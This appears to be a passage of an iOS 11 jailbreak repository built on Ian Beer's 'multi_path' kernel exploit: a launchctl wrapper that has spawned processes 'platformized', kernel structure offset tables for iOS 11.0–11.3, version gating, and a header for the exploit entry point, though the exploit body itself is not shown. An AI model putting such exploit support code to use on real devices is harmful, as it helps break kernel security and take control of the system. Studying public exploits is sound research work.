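int main(int argc, const char* argv[], const char* envp[]) {

    CPDistributedMessagingCenter *messageCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.jbclient"];

    pid_t pd = 0;
    posix_spawnattr_t attr;
    posix_spawnattr_init(&attr);
    posix_spawnattr_setflags(&attr, POSIX_SPAWN_START_SUSPENDED); //this flag will make the created process stay frozen until we send the CONT signal. This so we can platformize it before it launches.

    NSString *reallaunchctl = [NSString stringWithFormat:@"%@/launchctl_", [[NSBundle mainBundle] bundlePath]];

    int rv = posix_spawn(&pd, [reallaunchctl UTF8String], NULL, &attr, argv, envp);
    posix_spawnattr_destroy(&attr);

    // posix_spawn returns the error code directly (it does not set errno).
    if (rv != 0) {
        NSLog(@"posix_spawn of %@ failed: %d", reallaunchctl, rv);
        return rv;
    }

    [messageCenter sendMessageAndReceiveReplyName:@"platformize" userInfo:[NSDictionary dictionaryWithObject:[NSString stringWithFormat:@"%d", pd] forKey:@"pid"]];

    kill(pd, SIGCONT); //continue

    int a = 0;
    waitpid(pd, &a, 0);

    // Mirror the wrapped tool's exit code so callers see its failures.
    return WIFEXITED(a) ? WEXITSTATUS(a) : 1;
}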
27 |
--------------------------------------------------------------------------------
/multi_path/main.m:
--------------------------------------------------------------------------------
1 | //
2 | // main.m
3 | // multi_path
4 | //
5 | // Created by Ian Beer on 5/28/18.
6 | // Copyright © 2018 Ian Beer. All rights reserved.
7 | //
8 |
9 | #import
10 | #import "AppDelegate.h"
11 |
// Standard UIKit entry point: hands control to UIApplicationMain with
// AppDelegate as the application delegate; it does not return normally.
int main(int argc, char * argv[]) {
    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
    }
}
17 |
--------------------------------------------------------------------------------
/multi_path/multi_path.entitlements:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | com.apple.developer.networking.multipath
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/multi_path/offsets.h:
--------------------------------------------------------------------------------
1 | #ifndef offsets_h
2 | #define offsets_h
3 |
/* Symbolic names for kernel struct field offsets. Each enumerator is an
 * index into a per-kernel-version table (see kstruct_offsets_11_0 in
 * offsets.m, whose entries are commented with these names in the same
 * order) and is resolved to a byte offset by koffset() below. Keep the order
 * here and in the tables in sync: the tables are positional. */
enum kstruct_offset {
    /* struct task */
    KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
    KSTRUCT_OFFSET_TASK_REF_COUNT,
    KSTRUCT_OFFSET_TASK_ACTIVE,
    KSTRUCT_OFFSET_TASK_VM_MAP,
    KSTRUCT_OFFSET_TASK_NEXT,
    KSTRUCT_OFFSET_TASK_PREV,
    KSTRUCT_OFFSET_TASK_ITK_SPACE,
    KSTRUCT_OFFSET_TASK_BSD_INFO,

    /* struct ipc_port */
    KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
    KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
    KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
    KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
    KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
    KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
    KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
    KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
    KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,

    /* struct proc */
    KSTRUCT_OFFSET_PROC_PID,
    KSTRUCT_OFFSET_PROC_P_FD,

    /* struct filedesc */
    KSTRUCT_OFFSET_FILEDESC_FD_OFILES,

    /* struct fileproc */
    KSTRUCT_OFFSET_FILEPROC_F_FGLOB,

    /* struct fileglob */
    KSTRUCT_OFFSET_FILEGLOB_FG_DATA,

    /* struct socket */
    KSTRUCT_OFFSET_SOCKET_SO_PCB,

    /* struct pipe */
    KSTRUCT_OFFSET_PIPE_BUFFER,

    /* struct ipc_space */
    KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,
    KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,

    /* not a struct field; presumably an address adjustment — confirm in offsets.m */
    KFREE_ADDR_OFFSET,
};
51 |
/* Return the value recorded for `offset` in the table selected by
 * offsets_init(). If offsets_init() has not run yet, prints a message and
 * returns 0 (note 0 is also a legitimate table value). */
int koffset(enum kstruct_offset offset);

/* Choose the offset table for the running iOS version (11.0 up to, but not
 * including, 11.4). Prints a reason and exit()s the process on any other
 * version, so callers never see a failure return. */
void offsets_init(void);
54 |
55 | #endif
56 |
--------------------------------------------------------------------------------
/multi_path/offsets.m:
--------------------------------------------------------------------------------
1 | #import
2 |
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 |
9 | #include "offsets.h"
10 |
/* Active offset table: offsets_init() points this at one of the per-version
 * arrays below. Stays NULL until then, and koffset() refuses to index it
 * while it is NULL. */
int* offsets = NULL;
12 |
/*
 * Kernel structure field offsets used on iOS 11.0 - 11.2.6 (selected by
 * offsets_init()). This is a POSITIONAL initializer: entry i is the value
 * for enumerator i of enum kstruct_offset in offsets.h, so the two must be
 * edited together; the trailing comments are the only thing tying a value
 * to its name. Identical to kstruct_offsets_11_3 except for the last entry
 * (KFREE_ADDR_OFFSET).
 *
 * NOTE(review): a compile-time check that this table has exactly
 * KFREE_ADDR_OFFSET + 1 entries would catch the enum/table drift described
 * above; none exists today.
 */
int kstruct_offsets_11_0[] = {
    0xb,   // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
    0x10,  // KSTRUCT_OFFSET_TASK_REF_COUNT,
    0x14,  // KSTRUCT_OFFSET_TASK_ACTIVE,
    0x20,  // KSTRUCT_OFFSET_TASK_VM_MAP,
    0x28,  // KSTRUCT_OFFSET_TASK_NEXT,
    0x30,  // KSTRUCT_OFFSET_TASK_PREV,
    0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
    0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,

    0x0,   // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
    0x4,   // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
    0x40,  // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
    0x50,  // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
    0x60,  // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
    0x68,  // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
    0x88,  // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
    0x90,  // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
    0xa0,  // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,

    0x10,  // KSTRUCT_OFFSET_PROC_PID,
    0x108, // KSTRUCT_OFFSET_PROC_P_FD

    0x0,   // KSTRUCT_OFFSET_FILEDESC_FD_OFILES

    0x8,   // KSTRUCT_OFFSET_FILEPROC_F_FGLOB

    0x38,  // KSTRUCT_OFFSET_FILEGLOB_FG_DATA

    0x10,  // KSTRUCT_OFFSET_SOCKET_SO_PCB

    0x10,  // KSTRUCT_OFFSET_PIPE_BUFFER

    0x14,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
    0x20,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE

    0x6c,  // KFREE_ADDR_OFFSET
};
51 |
/*
 * Kernel structure field offsets used on iOS 11.3 up to, but not including,
 * 11.4 (selected by offsets_init()). POSITIONAL initializer: entry i is the
 * value for enumerator i of enum kstruct_offset in offsets.h, so the enum
 * and this table must be edited together. Identical to kstruct_offsets_11_0
 * except for the last entry (KFREE_ADDR_OFFSET).
 *
 * NOTE(review): as with the 11.0 table, there is no compile-time check that
 * the entry count matches the enumerator count.
 */
int kstruct_offsets_11_3[] = {
    0xb,   // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
    0x10,  // KSTRUCT_OFFSET_TASK_REF_COUNT,
    0x14,  // KSTRUCT_OFFSET_TASK_ACTIVE,
    0x20,  // KSTRUCT_OFFSET_TASK_VM_MAP,
    0x28,  // KSTRUCT_OFFSET_TASK_NEXT,
    0x30,  // KSTRUCT_OFFSET_TASK_PREV,
    0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
    0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,

    0x0,   // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
    0x4,   // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
    0x40,  // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
    0x50,  // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
    0x60,  // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
    0x68,  // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
    0x88,  // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
    0x90,  // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
    0xa0,  // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,

    0x10,  // KSTRUCT_OFFSET_PROC_PID,
    0x108, // KSTRUCT_OFFSET_PROC_P_FD

    0x0,   // KSTRUCT_OFFSET_FILEDESC_FD_OFILES

    0x8,   // KSTRUCT_OFFSET_FILEPROC_F_FGLOB

    0x38,  // KSTRUCT_OFFSET_FILEGLOB_FG_DATA

    0x10,  // KSTRUCT_OFFSET_SOCKET_SO_PCB

    0x10,  // KSTRUCT_OFFSET_PIPE_BUFFER

    0x14,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
    0x20,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE

    0x7c,  // KFREE_ADDR_OFFSET
};
90 |
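/*
 * Look up one kernel structure field offset in the table selected by
 * offsets_init().
 *
 * offset: an enumerator of enum kstruct_offset (offsets.h); it indexes the
 *         positional table directly.
 * Returns the recorded value, or 0 (after printing a diagnostic on stdout,
 * matching offsets_init()'s reporting style) when offsets_init() has not
 * run yet or `offset` lies outside the table. 0 is also a legitimate table
 * value, so callers cannot tell the two apart from the return value alone.
 */
int koffset(enum kstruct_offset offset) {
    if (offsets == NULL) {
        printf("need to call offsets_init() prior to querying offsets\n");
        return 0;
    }
    /* An enum argument is just an int at the call site, so a bogus value
     * would index past the end of the table. KFREE_ADDR_OFFSET is the last
     * enumerator, hence the table's highest valid index. The unsigned
     * compare also rejects negative values. */
    if ((unsigned int)offset > (unsigned int)KFREE_ADDR_OFFSET) {
        printf("koffset: offset index %d is out of range\n", (int)offset);
        return 0;
    }
    return offsets[offset];
}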
98 |
99 |
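/*
 * Select the kernel offset table for the running iOS version and point the
 * file-level `offsets` at it. Must be called before any koffset() lookup.
 *
 * Version gating via the @available runtime check:
 *   11.3 <= version < 11.4  -> kstruct_offsets_11_3
 *   11.0 <= version < 11.3  -> kstruct_offsets_11_0
 * Any other version prints why and terminates the process with
 * EXIT_FAILURE: 11.4 and later carry the fix for the bug these tables are
 * for, and releases before 11.0 have no table. There is no failure return,
 * so callers need no check of their own.
 *
 * Signature now carries an explicit (void) to match the prototype in
 * offsets.h.
 */
void offsets_init(void) {
    // Highest version first: @available(iOS X, *) is true on X and on
    // every later release, so the order of these tests matters.
    if (@available(iOS 11.4, *)) {
        printf("this bug is patched in iOS 11.4 and above\n");
        exit(EXIT_FAILURE);
    } else if (@available(iOS 11.3, *)) {
        printf("offsets selected for iOS 11.3 or above\n");
        offsets = kstruct_offsets_11_3;
    } else if (@available(iOS 11.0, *)) {
        printf("offsets selected for iOS 11.0 to 11.2.6\n");
        offsets = kstruct_offsets_11_0;
    } else {
        printf("iOS version too low, 11.0 required\n");
        exit(EXIT_FAILURE);
    }
}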
115 |
--------------------------------------------------------------------------------
/multi_path/sploit.h:
--------------------------------------------------------------------------------
1 | #ifndef sploit_h
2 | #define sploit_h
3 |
4 | mach_port_t run(void);
5 |
6 | #endif
7 |
--------------------------------------------------------------------------------
/multi_path/test:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/test
--------------------------------------------------------------------------------